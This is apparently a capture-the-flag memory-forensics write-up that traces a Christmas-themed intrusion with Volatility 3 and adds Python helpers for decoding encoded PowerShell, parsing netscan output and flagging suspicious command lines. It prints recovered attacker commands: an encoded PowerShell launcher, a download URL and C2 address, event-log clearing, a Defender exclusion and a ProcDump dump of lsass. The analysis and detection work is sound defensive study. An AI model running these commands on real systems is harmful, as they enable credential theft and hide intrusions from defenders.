Introduction
Oh no! Our IT administrator is a bit of a fool: ByteSparkle left his VPN configuration file in our beautiful private S3 location! Those dastardly attackers may already have gained access to our internal network. We believe they compromised one of our TinkerTech workstations. Our security team managed to obtain a memory dump for you. Please analyse it and answer the questions! Santa is waiting... Please note: these Sherlocks are built in sequence!
It is a memory image, but vol2 cannot process it, probably because the Windows version is fairly recent, so use vol3.
┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol3 -f ./santaclaus.bin windows.info
<SNIP>
Variable	Value
Kernel Base	0xf8055be18000
DTB	0x1aa000
Symbols	file:///home/mikannse/tools/other/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/CA8E2F01B822EDE6357898BFBF862997-1.json.xz
Is64Bit	True
IsPAE	False
layer_name	0 WindowsIntel32e
memory_layer	1 FileLayer
KdVersionBlock	0xf8055ca27368
Major/Minor	15.19041
MachineType	34404
KeNumberProcessors	1
SystemTime	2023-11-30 16:59:33
NtSystemRoot	C:\Windows
NtProductType	NtProductWinNt
NtMajorVersion	10
NtMinorVersion	0
PE MajorOperatingSystemVersion	10
PE MinorOperatingSystemVersion	0
PE Machine	34404
PE TimeDateStamp	Wed Jan 4 04:27:11 1995
What is the name of the file (including the file extension) that was probably copied from the shared folder?
┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol3 -f ./santaclaus.bin windows.filescan >file_scan
┌──(mikannse㉿kali)-[~/Desktop]
└─$ cat file_scan | grep -F "\\Users\\santaclaus\\"
0xa48df8fb1a00	\Users\santaclaus\Desktop\present_for_santa\present_for_santa	216
0xa48df8fb3170	\Users\santaclaus\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	216
0xa48df8fb3300	\Users\santaclaus\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	216
0xa48df8fb3940	\Users\santaclaus\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	216
0xa48df8fb3ad0	\Users\santaclaus\AppData\Roaming\Microsoft\Windows\Network Shortcuts	216
0xa48df8fb3c60	\Users\santaclaus\AppData\Local\Microsoft\Windows\Burn	216
0xa48df8fb4110	\Users\santaclaus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned	216
0xa48df8fb42a0	\Users\santaclaus\Desktop\present_for_santa.zip	216
<SNIP>
There is a present_for_santa.zip.
What is the name of the file (including the file extension) used to trigger the attack? We need to dump the file from the previous question out of the image.
┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol3 -f ./santaclaus.bin windows.dumpfiles --virtaddr 0xa48df8fb42a0
Volatility 3 Framework 2.5.2
Progress:  100.00		PDB scanning finished
Cache	FileObject	FileName	Result
DataSectionObject	0xa48df8fb42a0	present_for_santa.zip	file.0xa48df8fb42a0.0xa48dfbf1ba20.DataSectionObject.present_for_santa.zip.dat
Unzip it (the dumped .dat file was renamed to santa.zip first):
┌──(mikannse㉿kali)-[~/Desktop]
└─$ unzip santa.zip
Archive:  santa.zip
  inflating: present_for_santa/click_for_present.lnk
  inflating: present_for_santa/present.vbs
┌──(mikannse㉿kali)-[~/Desktop/present_for_santa]
└─$ cat click_for_present.lnk
P�O� �:i�+00�/C:\V1Windows@ ��.WindowsZ1System32B ��.System32▒t1WindowsPowerShellT ��.WindowsPowerShell N1v1.0: ��.v1.0l2powershell.exeN ��.powershell.exeTrick or treatB..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exep-ep bypass -enc JABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEMAOgBcAFUAcwBlAHIAcwBcACIAIAAtAEYAaQBsAHQAZQByACAAIgBwAHIAZQBzAGUAbgB0ACoALgB2AGIAcwAiACAALQBGAGkAbABlACAALQBSAGUAYwB1AHIAcwBlAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABGAHUAbABsAE4AYQBtAGUAOwBjAHMAYwByAGkAcAB0ACAAJABmAGkAbABlAA==C:\Windows\System32\shell32.dll�%SystemRoot%\System32\shell32.dll%SystemRoot%\System32\shell32.dll�%� �wN�▒�]N�D.��Q���� ��1SPS��XF�L8C���&�m�m.S-1-5-21-3849600975-1564034632-632203374-1001
┌──(mikannse㉿kali)-[~/Desktop/present_for_santa]
└─$ echo JABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEMAOgBcAFUAcwBlAHIAcwBcACIAIAAtAEYAaQBsAHQAZQByACAAIgBwAHIAZQBzAGUAbgB0ACoALgB2AGIAcwAiACAALQBGAGkAbABlACAALQBSAGUAYwB1AHIAcwBlAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABGAHUAbABsAE4AYQBtAGUAOwBjAHMAYwByAGkAcAB0ACAAJABmAGkAbABlAA== |base64 -d
$file = Get-ChildItem -Path "C:\Users\" -Filter "present*.vbs" -File -Recurse| Select-Object -ExpandProperty FullName;cscript $file
Clicking this shortcut launches PowerShell with an encoded command that searches C:\Users for a present*.vbs file and runs it with cscript, i.e. it executes another VBS script.
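The decode above is a one-off with echo and base64 -d. The following Python script is an added example (not part of this write-up or of the Sherlock materials) that does the same job against raw bytes, so it can be pointed directly at a dumped .lnk or a captured process command line: it finds a -enc/-EncodedCommand flag in either 8-bit text or UTF-16LE text (a Unicode LNK stores its COMMAND_LINE_ARGUMENTS as UTF-16LE) and decodes the base64-over-UTF-16LE payload. The LNK fragment it runs on is constructed here around the write-up's own base64 string; the surrounding field layout and the plain-text command line are assumptions made for illustration.

```python
"""Decode PowerShell -EncodedCommand payloads embedded in arbitrary bytes."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common
# abbreviations are listed. The argument itself is base64 over UTF-16LE text.
ENC_FLAG_RE = re.compile(
    r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)


def decode_powershell_b64(b64):
    """Decode one -EncodedCommand argument; returns None if it is not valid."""
    if isinstance(b64, str):
        b64 = b64.encode("ascii")
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def _text_views(blob):
    """Yield the blob as 8-bit text and as UTF-16LE at both byte alignments,
    so a flag stored either way can be matched with the same text regex."""
    yield blob.decode("latin-1")
    for offset in (0, 1):
        chunk = blob[offset:]
        chunk = chunk[: len(chunk) - len(chunk) % 2]   # utf-16 needs even length
        yield chunk.decode("utf-16-le", errors="replace")


def find_encoded_commands(blob):
    """Return every decodable -enc payload found in blob, in order, de-duplicated."""
    found = []
    for view in _text_views(blob):
        for match in ENC_FLAG_RE.finditer(view):
            decoded = decode_powershell_b64(match.group(1))
            if decoded and decoded not in found:
                found.append(decoded)
    return found


# Constructed sample input (not bytes carved from the image): the argument string
# of click_for_present.lnk from this write-up, laid out the way a Unicode LNK
# stores it (2-byte character count, then UTF-16LE text), between neighbouring
# fields. The 0x4C header field and the icon-path field are illustrative.
ENCODED = (
    "JABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAiAEMAOgBcAFUAcwBlAHIAcwBcACIAIAAtAEYAaQBsAHQAZQByACAAIgBwAHIAZQBzAGUAbgB0ACoALgB2AGIAcwAiACAALQBGAGkAbABlACAALQBSAGUAYwB1AHIAcwBlAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABGAHUAbABsAE4AYQBtAGUAOwBjAHMAYwByAGkAcAB0ACAAJABmAGkAbABlAA=="
)
LNK_ARGS = "-ep bypass -enc " + ENCODED
ICON = r"C:\Windows\System32\shell32.dll"
SAMPLE_LNK_FRAGMENT = (
    b"\x4c\x00\x00\x00"                                           # HeaderSize
    + len(LNK_ARGS).to_bytes(2, "little") + LNK_ARGS.encode("utf-16-le")
    + len(ICON).to_bytes(2, "little") + ICON.encode("utf-16-le")
)
# The same payload as it would appear in a plain-text process command line.
SAMPLE_CMDLINE = b"powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED.encode()

if __name__ == "__main__":
    for payload in find_encoded_commands(SAMPLE_LNK_FRAGMENT + SAMPLE_CMDLINE):
        print(payload)
```

Scanning both UTF-16LE alignments is what makes this work on a raw .lnk without parsing the full Shell Link structure; on a real dump you would also want to check for the base64 run being split across fields, which this version does not attempt.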
What is the name of the file (including the file extension) executed by click_for_present.lnk?
present.vbs
What is the name of the program the VBS script uses to run the next stage? Use VirusTotal and look at "Processes created".
https://www.virustotal.com/gui/file/78ba1ea3ac992391010f23b346eedee69c383bc3fd2d3a125ede6cba3ce77243/behavior
powershell.exe
What is the URL the next stage is downloaded from? Look at the "HTTP requests" section.
http://77.74.198.52/destroy_christmas/evil_present.jpg
From which IP and port does the executable download the shellcode (IP:Port)? Analysis shows that present.exe downloads the shellcode from a remote host and executes it, so dump it out of the image.
┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol3 -f ./santaclaus.bin windows.dumpfiles --virtaddr 0xa48df8fd7520
Volatility 3 Framework 2.5.2
Progress:  100.00		PDB scanning finished
Cache	FileObject	FileName	Result
DataSectionObject	0xa48df8fd7520	present.exe	file.0xa48df8fd7520.0xa48dfe212c30.DataSectionObject.present.exe.dat
ImageSectionObject	0xa48df8fd7520	present.exe	file.0xa48df8fd7520.0xa48dff93a270.ImageSectionObject.present.exe.img
Upload it to VirusTotal and look at "Network Communication".
77.74.198.52:445
What is the process ID of the remote process the shellcode was injected into? This involves a network connection, so check the network state.
┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol3 -f ./santaclaus.bin windows.netscan >net_scan
┌──(mikannse㉿kali)-[~/Desktop]
└─$ cat net_scan|grep 77.74.198.52
0xa48df88db790	TCPv4	192.168.68.6	49687	77.74.198.52	447	ESTABLISHED	724	svchost.exe	2023-11-30 16:42:41.000000
724
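As an added example (not from the write-up), here is a small parser for vol3 windows.netscan output that pivots on the remote C2 address to recover the owning PID, the same step done above with grep, but with the columns named so the result can be fed into further checks. The sample table is constructed: only the 77.74.198.52 row is the one observed in this image; the other rows and their offsets are invented to show unrelated sockets being skipped.

```python
"""Parse Volatility 3 windows.netscan output and pivot on a remote address."""

COLUMNS = ["offset", "proto", "local_addr", "local_port", "foreign_addr",
           "foreign_port", "state", "pid", "owner", "created"]


def _to_int(value):
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def parse_netscan(text):
    """Turn the table vol3 prints into a list of dicts, one per socket.

    Lines before the 'Offset' header (banner, progress) are skipped. vol3
    separates columns with tabs; a line without tabs is split on whitespace
    with maxsplit so the 'Created' timestamp (which contains a space) stays
    whole, but then an empty State column (UDP rows) cannot be told apart.
    """
    records = []
    in_table = False
    for line in text.splitlines():
        if not in_table:
            in_table = line.startswith("Offset")
            continue
        if not line.strip():
            continue
        fields = line.split("\t") if "\t" in line else line.split(None, 9)
        fields += [""] * (len(COLUMNS) - len(fields))        # pad short rows
        rec = dict(zip(COLUMNS, fields))
        for key in ("local_port", "foreign_port", "pid"):
            rec[key] = _to_int(rec[key])
        records.append(rec)
    return records


def connections_to(records, remote_ip):
    """Every socket whose foreign address is remote_ip (any port, any state)."""
    return [r for r in records if r["foreign_addr"] == remote_ip]


def pids_for(records, remote_ip):
    """Owning PIDs of those sockets: the processes to inspect for injected code."""
    return sorted({r["pid"] for r in connections_to(records, remote_ip)
                   if r["pid"] is not None})


# Constructed sample. Only the 77.74.198.52 row is the one seen in this image;
# the LISTENING and UDP rows and their offsets are made up for illustration.
SAMPLE_NETSCAN = "\n".join([
    "Volatility 3 Framework 2.5.2",
    "Progress:  100.00\t\tPDB scanning finished",
    "Offset\tProto\tLocalAddr\tLocalPort\tForeignAddr\tForeignPort\tState\tPID\tOwner\tCreated",
    "0xa48df88db790\tTCPv4\t192.168.68.6\t49687\t77.74.198.52\t447\tESTABLISHED\t724\tsvchost.exe\t2023-11-30 16:42:41.000000",
    "0xa48df8001000\tTCPv4\t0.0.0.0\t135\t0.0.0.0\t0\tLISTENING\t896\tsvchost.exe\t2023-11-30 16:40:01.000000",
    "0xa48df8002000\tUDPv4\t0.0.0.0\t5353\t*\t0\t\t1532\tsvchost.exe\t2023-11-30 16:40:05.000000",
])

if __name__ == "__main__":
    table = parse_netscan(SAMPLE_NETSCAN)
    for hit in connections_to(table, "77.74.198.52"):
        print(hit["pid"], hit["owner"], hit["foreign_addr"], hit["foreign_port"], hit["state"])
```

Feeding the real net_scan file in is just `parse_netscan(open("net_scan").read())`; the PID list is what you would hand to windows.malfind or a handle dump next.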
After establishing the command-and-control connection, what command did the attacker use to clear all event logs? Even though the log entries were cleared, the clearing command itself is still recorded in the event log.
┌──(mikannse㉿kali)-[~/Desktop]
└─$ cat file_scan |grep -i "powershell.evtx"
0xa48dfefe6e50	\Windows\System32\winevt\Logs\Windows PowerShell.evtx	216
┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol3 -f ./santaclaus.bin windows.dumpfiles --virtaddr 0xa48dfefe6e50
Volatility 3 Framework 2.5.2
Progress:  100.00		PDB scanning finished
Cache	FileObject	FileName	Result
DataSectionObject	0xa48dfefe6e50	Windows PowerShell.evtx	Error dumping file
SharedCacheMap	0xa48dfefe6e50	Windows PowerShell.evtx	file.0xa48dfefe6e50.0xa48dfef8b010.SharedCacheMap.Windows PowerShell.evtx.vacb
There are only 25 events in total; the command is in the earliest one.
Get-EventLog -List | ForEach-Object { Clear-EventLog -LogName $_.Log }
What is the full path of the folder excluded from Defender? In other words, which directory was added to Defender's exclusion list.
One of the events contains: powershell.exe Add-MpPreference -ExclusionPath c:\users\public
c:\users\public
What is the original name of the file that infected the victim? It is in the most recent event.
powershell.exe C:\Users\public\PresentForNaughtyChild.exe -accepteula -r -ma lsass.exe C:\Users\public\stolen_gift.dmp
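The three PowerShell events found above (log clearing, a Defender exclusion, an LSASS dump with ProcDump) are exactly the command lines a detection rule should flag before an analyst has to recover them from a memory image. The script below is an added example, not part of the write-up: a set of regex rules over command lines with a simple severity, run over the write-up's own commands plus constructed benign lines that must not fire. The rule names and the severity scheme are my own; the regexes only cover the switches seen on this page (plus wevtutil and Set-MpPreference, which are the standard built-in equivalents).

```python
"""Flag defence-evasion and credential-access patterns in PowerShell command lines."""
import re

# (tag, pattern). Case-insensitive and deliberately loose about extra switches.
RULES = [
    ("event_log_clearing",
     re.compile(r"\bClear-EventLog\b|\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.I)),
    ("defender_exclusion",
     re.compile(r"\bAdd-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", re.I)),
    ("defender_tamper",
     re.compile(r"\bSet-MpPreference\b.*-Disable\w+", re.I)),
    # ProcDump-style full/mini dump of lsass, or any lsass reference ending in a .dmp
    ("lsass_dump",
     re.compile(r"\blsass(?:\.exe)?\b.*\.dmp\b|-m[am]\s+lsass(?:\.exe)?\b", re.I)),
    ("encoded_command",
     re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("execution_policy_bypass",
     re.compile(r"-e(?:p|xecutionpolicy)\s+bypass\b", re.I)),
]

# Tags that on their own justify an immediate look at the host.
HIGH = {"event_log_clearing", "defender_exclusion", "defender_tamper", "lsass_dump"}


def classify(cmdline):
    """Return the tags of every rule that matches, in RULES order."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]


def severity(tags):
    if not tags:
        return "none"
    return "high" if HIGH & set(tags) else "medium"


def triage(lines):
    """Keep only the command lines that fire at least one rule."""
    results = []
    for line in lines:
        tags = classify(line)
        if tags:
            results.append({"cmdline": line, "tags": tags, "severity": severity(tags)})
    return results


SAMPLE_CMDLINES = [
    # The three commands recovered from Windows PowerShell.evtx in this write-up.
    "Get-EventLog -List | ForEach-Object { Clear-EventLog -LogName $_.Log }",
    "powershell.exe Add-MpPreference -ExclusionPath c:\\users\\public",
    "powershell.exe C:\\Users\\public\\PresentForNaughtyChild.exe -accepteula -r -ma lsass.exe C:\\Users\\public\\stolen_gift.dmp",
    # The shortcut's command line, with the base64 cut short (constructed).
    "powershell.exe -ep bypass -enc JABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABk",
    # Constructed benign activity that must not fire (note -ErrorAction is not -enc).
    "Get-Process | Sort-Object CPU -Descending",
    "Get-ChildItem -Path C:\\Users\\Public -Recurse -ErrorAction SilentlyContinue",
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_CMDLINES):
        print(hit["severity"], hit["tags"], hit["cmdline"][:60])
```

The -e prefix rule is the one that needs care: PowerShell accepts any unambiguous prefix of -EncodedCommand, so a rule that is too loose (`-e\w*`) also fires on -ErrorAction followed by a long word, which is why the benign sixth line is part of the sample.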
Dump this PresentForNaughtyChild.exe out of the image.
┌──(mikannse㉿kali)-[~/Desktop]
└─$ cat file_scan |grep -i "PresentForNaughtyChild.exe"
0xa48e00d10a90	\Users\Public\PresentForNaughtyChild.exe	216
┌──(mikannse㉿kali)-[~/Desktop]
└─$ vol3 -f ./santaclaus.bin windows.dumpfiles --virtaddr 0xa48e00d10a90
Volatility 3 Framework 2.5.2
Progress:  100.00		PDB scanning finished
Cache	FileObject	FileName	Result
DataSectionObject	0xa48e00d10a90	PresentForNaughtyChild.exe	file.0xa48e00d10a90.0xa48dfe2179b0.DataSectionObject.PresentForNaughtyChild.exe.dat
ImageSectionObject	0xa48e00d10a90	PresentForNaughtyChild.exe	file.0xa48e00d10a90.0xa48e005f02a0.ImageSectionObject.PresentForNaughtyChild.exe.img
┌──(mikannse㉿kali)-[~/Desktop]
└─$ file Naughty.exe
Naughty.exe: PE32 executable (console) Intel 80386, for MS Windows, 5 sections
┌──(mikannse㉿kali)-[~/Desktop]
└─$ exiftool Naughty.exe
ExifTool Version Number         : 12.76
File Name                       : Naughty.exe
Directory                       : .
File Size                       : 795 kB
File Modification Date/Time     : 2024:09:16 22:34:42+08:00
File Access Date/Time           : 2024:09:16 22:35:15+08:00
File Inode Change Date/Time     : 2024:09:16 22:35:12+08:00
File Permissions                : -rw-------
File Type                       : Win32 EXE
File Type Extension             : exe
MIME Type                       : application/octet-stream
Machine Type                    : Intel 386 or later, and compatibles
Time Stamp                      : 2022:10:19 01:51:38+08:00
Image File Characteristics      : Executable, 32-bit
PE Type                         : PE32
Linker Version                  : 14.33
Code Size                       : 221696
Initialized Data Size           : 568320
Uninitialized Data Size         : 0
Entry Point                     : 0x168d9
OS Version                      : 6.0
Image Version                   : 0.0
Subsystem Version               : 6.0
Subsystem                       : Windows command line
File Version Number             : 11.0.0.0
Product Version Number          : 11.0.0.0
File Flags Mask                 : 0x0017
File Flags                      : (none)
File OS                         : Win32
Object File Type                : Unknown
File Subtype                    : 0
Language Code                   : English (U.S.)
Character Set                   : Unicode
Company Name                    : Sysinternals - www.sysinternals.com
File Description                : Sysinternals process dump utility
File Version                    : 11.0
Internal Name                   : ProcDump
Legal Copyright                 : Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Original File Name              : procdump
Product Name                    : ProcDump
Product Version                 : 11.0
The original file name is procdump.exe.
What is the name of the process targeted by procdump.exe?
lsass.exe